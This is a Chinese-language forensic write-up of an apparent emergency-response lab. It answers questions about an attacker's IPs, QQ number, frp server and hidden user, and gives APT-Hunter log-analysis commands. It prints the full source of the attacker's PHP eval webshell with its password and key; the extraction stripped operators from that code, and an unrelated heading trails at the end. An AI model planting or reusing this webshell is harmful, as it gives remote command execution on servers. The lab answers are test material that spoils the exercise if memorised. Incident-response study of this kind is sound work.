在解题前请确保您已解的一下内容:1.攻击者的IP地址两个2.攻击者的webshell文件名3.攻击者的webshell密码4.攻击者的QQ号5.攻击者的服务器伪IP地址6.攻击者的服务器端口7.攻击者是如何入侵的选择题8.攻击者的隐藏用户名一、两个ip地址扫描出来是一个system.php文件?php session_start(); set_time_limit(0); error_reporting(0); function encode($D,$K){ for($i0;$istrlen($D);$i) { $c $K[$i115]; $D[$i] $D[$i]^$c; } return $D; } $passhack6618; $payloadNamepayload; $key7813d1590d28a7dd; if (isset($_POST[$pass])){ $dataencode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payloadencode($_SESSION[$payloadName],$key); if (strpos($payload,getBasicsInfo)false){ $payloadencode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,getBasicsInfo)!false){ $_SESSION[$payloadName]encode($data,$key); } } }这段PHP代码是一个典型的Webshell后门程序用于在受感染的服务器上执行远程命令。然后我们分析日志。日志路径C:\phpstudy_pro\Extensions\Apache2.4.39\logs192.168.126.135接下来我们分析windows的系统日志使用APT-Hunter工具的powershell日志收集器自动收集日志信息将得到的日志解压。Powershellcd C:\你的路径\APT-Hunter-3.2解除系统默认脚本执行限制仅首次需要Set-ExecutionPolicy RemoteSigned # 弹出提示输入 Y 确认一键自动采集命令.\windows-log-collector-full-v3-CSV.ps1使用 APT-Hunter 主 Python 脚本自动分析这批日志python APT-Hunter.py -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport -p提供包含使用powershell日志收集器提取的日志的解压路径 -o输出生成项目的名称192.168.126.129二、攻击者的webshell文件名system.php三、攻击者的webshell密码hack6618四、攻击者的QQ号Tecent files 腾讯文件可能指的是QQ之类的攻击者的QQ号777888999321五、攻击者的服务器伪IP地址在隐藏用户的文件中搜集信息FileRecv为QQ的接收的文件夹发现frp内网穿透工具找到配置信息查看256.256.66.88六、攻击者的服务器端口65536七、攻击者是如何入侵的选择题查看ftp日志文件分析日志文件查找后门system.php文件发现正在进行爆破八、攻击者的隐藏用户名hack887成功
在编程中的核心作用:从命名空间到代码组织)
